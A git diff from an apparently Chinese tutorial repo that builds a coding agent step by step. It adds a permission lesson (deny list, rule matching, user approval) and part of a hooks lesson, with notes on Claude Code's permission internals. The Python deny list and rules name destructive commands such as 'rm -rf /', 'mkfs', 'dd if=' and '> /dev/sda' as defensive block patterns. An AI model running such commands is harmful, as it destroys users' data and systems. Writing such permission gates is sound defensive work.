呼び出しとテレメトリに依存) +- 権限バブリング → 省略(s15 でマルチ Agent を扱う) + +
+ + diff --git a/s03_permission/README.md b/s03_permission/README.md new file mode 100644 index 000000000..8d88cf74c --- /dev/null +++ b/s03_permission/README.md @@ -0,0 +1,231 @@ +# s03: Permission — 先划边界,再给自由 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → `s03` → [s04](../s04_hooks/) → s05 → ... → s19 +> *"先划边界, 再给自由"* — 权限管线决定哪些操作需要审批。 +> +> **Harness 层**: 权限 — 在工具执行前加一道门。 + +--- + +## 问题 + +s02 的 Agent 手里有 5 个工具,什么都能做。你让它"清理一下项目",它可能执行 `rm -rf /`。 + +你不应该靠**信任模型**来保证安全。安全应该是**代码**来保证——在工具执行之前加一道门。 + +--- + +## 解决方案 + +![Permission Overview](images/permission-overview.svg) + +s02 的循环完全保留。唯一的变动在工具执行前插入 `check_permission()`——每个工具调用经过三道闸门,顺序固定:硬拒绝优先,软询问次之,都没命中就放行。 + +三道闸门对应三种决策: + +| 闸门 | 作用 | 命中后 | +|------|------|--------| +| 1. 拒绝列表 | 永远禁止的操作(`rm -rf /`、`sudo`) | 直接拒绝,不执行 | +| 2. 规则匹配 | 取决于上下文的操作(写工作区外、`rm` 文件) | 交给闸门 3 | +| 3. 用户审批 | 闸门 2 命中后,暂停等用户确认 | 用户决定允许或拒绝 | + +三道都没命中 → 直接执行。大部分日常操作走这条路。 + +--- + +## 工作原理 + +![Permission Pipeline](images/permission-pipeline.svg) + +**闸门 1**:一张硬拒绝表,先查,命中就返回阻止信息。 + +```python +DENY_LIST = [ + "rm -rf /", "sudo", "shutdown", "reboot", + "mkfs", "dd if=", "> /dev/sda", +] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None +``` + +**闸门 2**:规则匹配——描述"什么时候需要问用户"。每条规则指定工具和检查条件。 + +```python +PERMISSION_RULES = [ + { + "tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace", + }, + { + "tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]), + "message": "Potentially destructive command", + }, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None +``` + +**闸门 3**:规则命中后,暂停等用户输入。 + +```python +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n⚠ {reason}") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" +``` + +**三道闸门串在一起**,插在工具执行之前: + +```python +def check_permission(block) -> bool: + # 闸门 1: 硬拒绝 + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n⛔ {reason}") + return False + + # 闸门 2 + 3: 规则匹配 → 用户审批 + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + + return True + +# 在 agent_loop 中——s02 的循环只加了一行: +for block in response.content: + if block.type == "tool_use": + if not check_permission(block): # ← 新增 + results.append({... "content": "Permission denied."}) + continue + output = TOOL_HANDLERS[block.name](**block.input) # s02 原有 + results.append(...) +``` + +--- + +## 相对 s02 的变更 + +| 组件 | 之前 (s02) | 之后 (s03) | +|------|-----------|-----------| +| 安全模型 | 无(信任模型) | 三道闸门权限管线 | +| 新函数 | — | check_deny_list, check_rules, ask_user, check_permission | +| 循环 | 直接执行所有工具 | 执行前插入 check_permission() | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s03_permission/code.py +``` + +试试这些 prompt: + +1. `Create a file called test.txt in the current directory`(应该直接通过) +2. `Delete all temporary files in /tmp`(bash + rm 会触发闸门 2) +3. `What files are in the current directory?`(只读,全部通过) +4. `Try to write a file to /etc/something`(写工作区外,触发闸门 2) + +观察重点:哪些操作直接通过?哪些需要你确认?哪些被直接拒绝? + +--- + +## 接下来 + +权限检查做了——但每次都在循环里硬编码 `check_permission()`。如果我想在每次工具执行前后加日志?如果想在某些操作后自动触发 git commit?这些扩展逻辑散落在 loop 里,循环很快就会变成一坨浆糊。 + +s04 Hooks → 给循环装一排钩子。扩展逻辑挂在钩子上,循环本身永远干净。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `types/permissions.ts`、`toolExecution.ts`、`tools.ts`、`yoloClassifier.ts`、`bashPermissions.ts` 的完整分析。 + +### 一、PermissionResult:不是 3 种,是 4 种 + +教学版的三道闸门(deny → ask → allow)和 CC 不完全对应。CC 的 `PermissionResult` 有 4 个 behavior(`types/permissions.ts:241-266`): + +| behavior | 含义 | 教学版对应 | +|----------|------|-----------| +| `allow` | 直接允许 | 闸门 3 通过 | +| `deny` | 直接拒绝 | 闸门 1 命中 | +| `ask` | 弹出对话框问用户 | 闸门 2 命中 | +| `passthrough` | 工具不表态,交给通用管线决定 | 教学版无 | + +### 二、完整的 8 步验证管线 + +CC 的 `checkPermissionsAndCallTool()`(`toolExecution.ts:599-1745`)不是三道闸门,是八步: + +1. **Zod schema 验证**(L615)— 参数类型检查 +2. **validateInput()**(L683)— 工具级语义验证 +3. **backfillObservableInput()**(L784)— 补全遗留字段 +4. **PreToolUse hooks**(L800)— 钩子可以返回 allow/deny/ask +5. **resolveHookPermissionDecision()**(L921)— 协调钩子+管线决策 +6. **hasPermissionsToUseTool()** — 六层规则检查: + - 1a. 整个工具被 deny rule 禁用 → `deny` + - 1b. 整个工具被 ask rule 标记 → `ask` + - 1c. `tool.checkPermissions()` 工具自己的判断 + - 1d. 工具自己返回 deny → `deny` + - 1e. `requiresUserInteraction()` → `ask` + - 1f. 内容相关的 ask 规则 → `ask`(不可绕过) + - 1g. 安全检查违规 → `ask`(不可绕过) +7. **模式绕过**(L1268)— bypassPermissions 模式 → `allow` +8. **passthrough → ask 转换**(L1300)— 默认转为询问 + +### 三、拒绝列表:不是一个文件,是 8 个来源 + +CC 没有单一的 deny list。权限规则来自 8 个来源(`types/permissions.ts:54-62`): + +| 来源 | 配置位置 | +|------|---------| +| `userSettings` | `~/.claude/settings.json` | +| `projectSettings` | `.claude/settings.json` | +| `localSettings` | `settings.local.json` | +| `flagSettings` | Feature flags | +| `policySettings` | 企业管理策略 | +| `cliArg` | `--allowedTools` / `--deniedTools` | +| `command` | 内联命令 | +| `session` | 会话内临时授权 | + +每条规则格式:`{ toolName: "Bash", ruleBehavior: "deny", ruleContent: "npm publish:*" }`。多个来源的规则合并,按优先级排序(local > project > user)。 + +### 四、isDestructive() 是什么 + +教学版把 `isDestructive` 当作权限判断的一部分。但 CC 中它**纯粹是 UI 展示用的**(`Tool.ts:406`)——在工具列表里显示 `[destructive]` 标签。它不参与权限决策。默认所有工具都返回 `false`。只有 ExitWorktree(remove 时)和 MCP 工具(依赖 `annotations.destructiveHint`)覆写了它。 + +### 五、YoloClassifier(自动审批) + +CC 的 auto 模式下,不会每次都弹对话框。`classifyYoloAction`(`yoloClassifier.ts:1012`)把工具调用 + 对话上下文发给一个分类器 LLM 判断是否安全。先尝试 acceptEdits 模式模拟(如果 acceptEdits 允许 → 直接批准),再查安全工具白名单,最后才调分类器。分类器连续拒绝太多次 → 回退到人工审批。 + +### 六、权限冒泡 + +子 Agent(通过 AgentTool fork 出来的)的 `permissionMode` 设为 `'bubble'`(`forkSubagent.ts:50`)。意思是权限弹窗**冒泡到父 Agent 的终端**,而不是在子 Agent 里静默拒绝。Bash 分类器在这个过程中继续跑——给权限对话框显示的同时在后台判断是否可以自动批准。 + +### 教学版的简化是刻意的 + +- 8 步管线 → 3 道闸门:理解门槛大幅降低 +- 8 个规则来源 → 1 个本地 DENY_LIST:概念量可控 +- isDestructive → 忽略(教学版没有 UI 层) +- YoloClassifier → 省略(依赖于额外的 LLM 调用和遥测系统) +- 权限冒泡 → 省略(s15 才涉及多 Agent) + +
+ + diff --git a/s03_permission/code.py b/s03_permission/code.py new file mode 100644 index 000000000..679f194d5 --- /dev/null +++ b/s03_permission/code.py @@ -0,0 +1,248 @@ +#!/usr/bin/env python3 +""" +s03_permission.py - Permission System + +Three gates inserted before tool execution: + + Gate 1: Hard deny list (rm -rf /, sudo, ...) + Gate 2: Rule matching (write outside workspace? destructive cmd?) + Gate 3: User approval (pause and wait for confirmation) + + +-------+ +--------+ +--------+ +--------+ +------+ + | Tool | -> | Gate 1 | -> | Gate 2 | -> | Gate 3 | -> | Exec | + | call | | deny? | | match? | | allow? | | | + +-------+ +--------+ +--------+ +--------+ +------+ + | | | | + v v v v + (normal) (blocked) (ask user) (user says no?) + +Only one line added to the agent loop: + + if not check_permission(block): + continue + +Builds on s02 (multi-tool). Usage: + + python s03_permission/code.py + Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {WORKDIR}. All destructive operations require user approval." + + +# ═══════════════════════════════════════════════════════════ +# FROM s02 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# FROM s02 (unchanged): Tool Definitions & Dispatch +# ═══════════════════════════════════════════════════════════ + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, +} + + +# ═══════════════════════════════════════════════════════════ +# NEW in s03: Three-Gate Permission Pipeline +# ═══════════════════════════════════════════════════════════ + +# Gate 1: Hard deny list — always forbidden +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if=", "> /dev/sda"] + +def check_deny_list(command: str) -> str | None: + for pattern in DENY_LIST: + if pattern in command: + return f"Blocked: '{pattern}' is on the deny list" + return None + + +# Gate 2: Rule matching — context-dependent checks +PERMISSION_RULES = [ + {"tools": ["write_file", "edit_file"], + "check": lambda args: not str(args.get("path", "")).startswith(str(WORKDIR)), + "message": "Writing outside workspace"}, + {"tools": ["bash"], + "check": lambda args: any(kw in args.get("command", "") for kw in ["rm ", "> /etc/", "chmod 777"]), + "message": "Potentially destructive command"}, +] + +def check_rules(tool_name: str, args: dict) -> str | None: + for rule in PERMISSION_RULES: + if tool_name in rule["tools"] and rule["check"](args): + return rule["message"] + return None + + +# Gate 3: User approval — wait for confirmation after rule match +def ask_user(tool_name: str, args: dict, reason: str) -> str: + print(f"\n\033[33m⚠ {reason}\033[0m") + print(f" Tool: {tool_name}({args})") + choice = input(" Allow? [y/N] ").strip().lower() + return "allow" if choice in ("y", "yes") else "deny" + + +# Pipeline: all three gates chained +def check_permission(block) -> bool: + if block.name == "bash": + reason = check_deny_list(block.input.get("command", "")) + if reason: + print(f"\n\033[31m⛔ {reason}\033[0m") + return False + reason = check_rules(block.name, block.input) + if reason: + decision = ask_user(block.name, block.input, reason) + if decision == "deny": + return False + return True + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s02, with check_permission() inserted +# ═══════════════════════════════════════════════════════════ + +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + print(f"\033[36m> {block.name}\033[0m") + + # s03 change: run through permission pipeline before executing + if not check_permission(block): + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": "Permission denied."}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s03: Permission") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms03 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s03_permission/images/permission-overview.en.svg b/s03_permission/images/permission-overview.en.svg new file mode 100644 index 000000000..9ea96e536 --- /dev/null +++ b/s03_permission/images/permission-overview.en.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — Three Gates + + + + Tool call enters + + + + + + Gate 1: Deny List + rm -rf /, sudo, shutdown + + + + + + Gate 2: Rule Matching + Write outside ws? Destructive? + + + + + + Allow + or ask user + + + + Three Decisions + + + Deny + Gate 1 matched, blocked + + + Ask + Gate 2 matched, ask user + + + Allow + All passed, execute + + Priority: Gate 1 (hard deny) → Gate 2 (soft ask) → unmatched defaults to allow + diff --git a/s03_permission/images/permission-overview.ja.svg b/s03_permission/images/permission-overview.ja.svg new file mode 100644 index 000000000..b397b8ce9 --- /dev/null +++ b/s03_permission/images/permission-overview.ja.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — 3 つのゲート + + + + ツール呼び出し + + + + + + ゲート 1: 拒否リスト + rm -rf /, sudo, shutdown + + + + + + ゲート 2: ルール照合 + ws 外への書き込み?破壊的? + + + + + + 許可 + またはユーザー承認 + + + + 3 つの決定 + + + 拒否 (deny) + ゲート 1 一致、即座に拒否 + + + 確認 (ask) + ゲート 2 一致、ユーザー確認待ち + + + 許可 (allow) + すべて通過、直接実行 + + 優先順位:ゲート 1(ハード拒否)→ ゲート 2(ソフト確認)→ 一致しない場合はデフォルトで許可 + diff --git a/s03_permission/images/permission-overview.svg b/s03_permission/images/permission-overview.svg new file mode 100644 index 000000000..91bc020e8 --- /dev/null +++ b/s03_permission/images/permission-overview.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — 循环不变,工具执行前加一道门 + + + s02 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + + 返回结果 + + + + + + + s03 新增 + + + + check_permission() + + + + 闸门 1: 拒绝列表 + + + + 闸门 2: 规则匹配 + + + + 闸门 3: 用户审批 + + + + 拒绝 + + + + 通过 + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... + + + + + + + + s02 保留(循环、LLM、分发——完全不变) + + s03 新增(三道闸门权限管线) + diff --git a/s03_permission/images/permission-pipeline.en.svg b/s03_permission/images/permission-pipeline.en.svg new file mode 100644 index 000000000..b61586823 --- /dev/null +++ b/s03_permission/images/permission-pipeline.en.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — Loop unchanged, a gate before tool execution + + + s02 preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + + Return result + + + + Yes + + + s03 new + + + + check_permission() + + + + Gate 1: Deny List + + + + Gate 2: Rule Matching + + + + Gate 3: User Approval + + + + Deny + + + + Pass + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... + + + + + + + + s02 preserved (loop, LLM, dispatch — unchanged) + + s03 new (three-gate permission pipeline) + diff --git a/s03_permission/images/permission-pipeline.ja.svg b/s03_permission/images/permission-pipeline.ja.svg new file mode 100644 index 000000000..38dbe3424 --- /dev/null +++ b/s03_permission/images/permission-pipeline.ja.svg @@ -0,0 +1,97 @@ + + + + + + + + + + + + + + + + + + + + + + + + Permission — ループは変更なし、ツール実行前にゲートを追加 + + + s02 維持 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + + 結果を返す + + + + Yes + + + s03 新規 + + + + check_permission() + + + + ゲート 1: 拒否リスト + + + + ゲート 2: ルール照合 + + + + ゲート 3: ユーザー承認 + + + + 拒否 + + + + 通過 + + + s02 + + + + TOOL_ + HANDLERS + bash/read/write/... + + + + + + + + s02 維持(ループ、LLM、ディスパッチ — 変更なし) + + s03 新規(3 ゲート権限パイプライン) + diff --git a/s03_permission/images/permission-pipeline.svg b/s03_permission/images/permission-pipeline.svg new file mode 100644 index 000000000..121cacb79 --- /dev/null +++ b/s03_permission/images/permission-pipeline.svg @@ -0,0 +1,58 @@ + + + + + + + + + + + + + + Permission Pipeline — 三道闸门 + + + + 工具调用进入 + + + + + + 闸门 1: 拒绝列表 + rm -rf /, sudo, shutdown + + + + + + 闸门 2: 规则匹配 + 写工作区外?读敏感路径? + + + + + + 允许执行 + 或需用户审批 + + + + 三种决策 + + + 阻止 (deny) + 闸门 1 命中,直接拒绝 + + + 询问 (ask) + 闸门 2 命中,等用户确认 + + + 允许 (allow) + 全部通过,直接执行 + + 规则优先:闸门 1(硬拒绝)→ 闸门 2(软询问)→ 不匹配的默认允许 + diff --git a/s04_hooks/README.en.md b/s04_hooks/README.en.md new file mode 100644 index 000000000..dd5fb7c4c --- /dev/null +++ b/s04_hooks/README.en.md @@ -0,0 +1,280 @@ +# s04: Hooks — Hang on the Loop, Don't Write into It + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"Hang on the loop, don't write into it"* — Hooks inject extension logic before and after tool execution. +> +> **Harness Layer**: Hooks — Extension points that don't invade the loop. + +--- + +## The Problem + +The s03 Agent has permission checks. But every new check — "log every bash call", "auto git add after writes" — requires modifying the `agent_loop` function. + +The loop quickly becomes this: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # added a line + check_permission(block) # added a line + notify_slack(block) # added another line + output = execute(block) + auto_git_add(block) # yet another line + # ... the loop is unrecognizable +``` + +What you want to extend is the Agent's behavior, but what you're modifying is the loop itself. The loop should be a stable core — extensions should hang on the outside. + +--- + +## The Solution + +![Hooks Overview](images/hooks-overview.en.svg) + +The s03 loop and permission logic are fully preserved. The only change is moving `check_permission()` from inside the loop body onto a hook — the loop no longer directly calls any check function. Instead it calls `trigger_hooks("PreToolUse", block)`, and the registry decides what to run. + +Four events, covering a complete agent cycle: + +| Event | Trigger Timing | Typical Use | +|-------|---------------|-------------| +| UserPromptSubmit | After user input, before entering LLM | Input validation, context injection | +| PreToolUse | Before tool execution | Permission checks, logging | +| PostToolUse | After tool execution | Auto git add, result post-processing | +| Stop | When the loop is about to exit | Force continuation, cleanup | + +Adding an extension = `register_hook()`. The loop doesn't change. + +--- + +## How It Works + +**Hook registry** — a dict mapping event names to callback lists: + +```python +HOOKS = { + "UserPromptSubmit": [], + "PreToolUse": [], + "PostToolUse": [], + "Stop": [], +} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: # return value ≠ None → hook says "stop" + return result + return None +``` + +**UserPromptSubmit** — triggers after user input, before entering the LLM. Can inject context or intercept input: + +```python +def context_inject_hook(query: str) -> str | None: + """Inject current working directory info into every prompt.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None # return None = no modification, let prompt through + +register_hook("UserPromptSubmit", context_inject_hook) +``` + +In the main loop, triggered right after user input: + +```python +query = input("s04 >> ") +trigger_hooks("UserPromptSubmit", query) # ← before entering LLM +history.append({"role": "user", "content": query}) +agent_loop(history) +``` + +**PreToolUse / PostToolUse** — hooks before and after tool execution. s03's permission check logic is now wrapped as a PreToolUse hook, plus a logging hook and a large-output reminder: + +```python +# PreToolUse: permission check (s03 logic, moved from loop to hook) +def permission_hook(block): + if block.name == "bash": + for pattern in DENY_LIST: + if pattern in block.input.get("command", ""): + return "Permission denied by deny list" + if block.name in ("write_file", "edit_file"): + path = block.input.get("path", "") + if not path.startswith(str(WORKDIR)): + choice = input(" Allow? [y/N] ").strip().lower() + if choice not in ("y", "yes"): + return "Permission denied by user" + return None + +# PreToolUse: logging +def log_hook(block): + print(f"[HOOK] {block.name}(...)") + +# PostToolUse: large output reminder +def large_output_hook(block, output): + if len(str(output)) > 100000: + print(f"[HOOK] ⚠ Large output from {block.name}") + +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("PostToolUse", large_output_hook) +``` + +**Stop** — triggers when the loop is about to exit (`stop_reason != "tool_use"`). Can prevent exit, force continuation, or do cleanup: + +```python +def summary_hook(messages: list) -> str | None: + """Print a summary when the loop is about to stop.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None # return None = allow stop, return string = force continuation + +register_hook("Stop", summary_hook) +``` + +In agent_loop, triggered before exit: + +```python +if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) # ← before exiting + if force: + # hook returned a message → inject it and continue + messages.append({"role": "user", "content": force}) + continue + return +``` + +**Only one change in the loop** — s03 directly called `check_permission(block)`, s04 replaces it with `trigger_hooks("PreToolUse", block)`: + +```python +for block in response.content: + if block.type != "tool_use": + continue + + # s03: if not check_permission(block): ... + # s04: hooks replace hardcoding + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) +``` + +Four hooks cover every critical node of the agent cycle: input → before execution → after execution → exit. The loop itself stays clean forever. + +--- + +## Changes from s03 + +| Component | Before (s03) | After (s04) | +|-----------|-------------|-------------| +| Extension method | check_permission() hardcoded in the loop | HOOKS registry + trigger_hooks() | +| New functions | — | register_hook, trigger_hooks | +| Hook callbacks | — | context_inject_hook, permission_hook, log_hook, large_output_hook, summary_hook | +| Loop | Directly calls check_permission() | Calls trigger_hooks("PreToolUse", ...) | +| Exit control | None | trigger_hooks("Stop", ...) can prevent exit | +| Input interception | None | trigger_hooks("UserPromptSubmit", ...) can inject context | + +--- + +## Try It + +```sh +cd learn-claude-code +python s04_hooks/code.py +``` + +Try these prompts: + +1. `Read the file README.md` (should pass directly — observe hook logs) +2. `Create a file called test.txt` (after creation, observe if PostToolUse fires) +3. `Delete all temporary files in /tmp` (bash + rm triggers permission hook) + +What to watch for: Before each tool execution, does the `[HOOK]` log appear? When permission is denied, was it intercepted by a hook or hardcoded in the loop? + +--- + +## What's Next + +The Agent can now safely execute operations. But does it ever stop to think "what should I do first, and what next?" Given a complex task, does it charge in blindly, or plan first? + +→ s05 TodoWrite: Give the Agent a planning tool. Make a list first, then execute. Completion rate doubles. + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `toolHooks.ts` (650 lines), `hooks.ts`, `stopHooks.ts`, and `coreTypes.ts`. + +### 1. Hook Events: Not 2, but 27 + +The teaching version covers only PreToolUse and PostToolUse. CC actually has 27 hook events (`coreTypes.ts:25-53`): + +| Category | Events | +|----------|--------| +| Tool-related | `PreToolUse`, `PostToolUse`, `PostToolUseFailure` | +| Session-related | `SessionStart`, `SessionEnd`, `Stop`, `StopFailure`, `Setup` | +| User interaction | `UserPromptSubmit`, `Notification`, `PermissionRequest`, `PermissionDenied` | +| Sub-agents | `SubagentStart`, `SubagentStop` | +| Compaction-related | `PreCompact`, `PostCompact` | +| Team-related | `TeammateIdle`, `TaskCreated`, `TaskCompleted` | +| Other | `Elicitation`, `ElicitationResult`, `ConfigChange`, `WorktreeCreate`, `WorktreeRemove`, `InstructionsLoaded`, `CwdChanged`, `FileChanged` | + +The teaching version covers only 4 core events (UserPromptSubmit, PreToolUse, PostToolUse, Stop) because they cover every critical node of a complete agent cycle. The other 23 follow the same pattern. + +### 2. HookResult Complete Fields + +CC's `HookResult` (`types/hooks.ts:260-275`) has 13 fields: + +| Field | Type | Purpose | +|-------|------|---------| +| `message` | Message | Optional UI message | +| `blockingError` | HookBlockingError | Blocking error → injected into conversation for model self-correction | +| `outcome` | success/blocking/non_blocking_error/cancelled | Execution result | +| `preventContinuation` | boolean | Prevent subsequent execution | +| `stopReason` | string | Stop reason description | +| `permissionBehavior` | allow/deny/ask/passthrough | Hook returns permission decision | +| `updatedInput` | Record | Modify tool input | +| `additionalContext` | string | Additional context | +| `updatedMCPToolOutput` | unknown | MCP tool output modification | + +### 3. Key Invariant: Hook 'allow' Cannot Bypass deny/ask Rules + +This is the most important security design in CC's permission system (`toolHooks.ts:325-331`): **when a hook returns allow, it still checks settings.json deny/ask rules.** Even if the user's hook script says "allow", if the tool is disabled in settings.json, the operation is still blocked. + +The teaching version doesn't have this layer — hooks returning non-None directly interrupt. This is sufficient for teaching, but would create a security vulnerability in production. + +### 4. stopHookActive Mechanism + +CC's Stop hooks have an infinite-loop prevention mechanism (`query.ts:212,1300`): the `stopHookActive` state field. When stop hooks produce a blockingError, the loop re-enters with `stopHookActive: true`. Subsequent iterations see this flag and don't trigger stop hooks again. This prevents a never-stopping bug — model self-corrects → stop hook errors again → model self-corrects again → stop hook errors again... + +### 5. hook_stopped_continuation + +When PostToolUse hooks return `preventContinuation: true`, a `hook_stopped_continuation` attachment is produced (`toolHooks.ts:117-130`). query.ts (L1388-1393) detects it and sets `shouldPreventContinuation = true`, causing the loop to exit. This is the mechanism for "hooks gracefully shut down the Agent" — not a crash, but a completion. + +### Teaching Version Simplifications Are Intentional + +- 27 events → 4 (UserPromptSubmit/PreToolUse/PostToolUse/Stop): covers agent cycle critical nodes +- 13 fields → simple return values (None = continue, non-None = interrupt/continue): minimal cognitive load +- Hook allow vs deny/ask invariant → omitted: teaching version has no settings.json layer +- stopHookActive → omitted: teaching version Stop hook only does simple continuation, no infinite-loop prevention needed + +
+ + diff --git a/s04_hooks/README.ja.md b/s04_hooks/README.ja.md new file mode 100644 index 000000000..b25403a80 --- /dev/null +++ b/s04_hooks/README.ja.md @@ -0,0 +1,280 @@ +# s04: Hooks — ループに掛ける、ループには書き込まない + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → `s04` → [s05](../s05_todo_write/) → s06 → ... → s19 + +> *"ループに掛ける、ループには書き込まない"* — フックがツール実行の前後に拡張ロジックを注入する。 +> +> **Harness レイヤー**: フック — ループを侵襲しない拡張ポイント。 + +--- + +## 課題 + +s03 の Agent には権限チェックがある。しかし新しいチェックを追加するたび — 「bash 呼び出しを毎回ログに記録」「操作後に自動 git add」— `agent_loop` 関数を修正する必要がある。 + +ループはすぐにこうなる: + +```python +def agent_loop(messages): + while True: + # ... LLM call ... + for block in response.content: + if block.type == "tool_use": + log_to_file(block) # 一行追加 + check_permission(block) # 一行追加 + notify_slack(block) # さらに一行追加 + output = execute(block) + auto_git_add(block) # さらに一行追加 + # ... もうループが見えない +``` + +拡張したいのは Agent の振る舞いなのに、変更しているのはループそのもの。ループは安定した核心であるべき — 拡張は外側に掛ける。 + +--- + +## ソリューション + +![Hooks Overview](images/hooks-overview.ja.svg) + +s03 のループと権限ロジックは完全に保持される。唯一の変更点は `check_permission()` をループ本体内からフックに移動したこと — 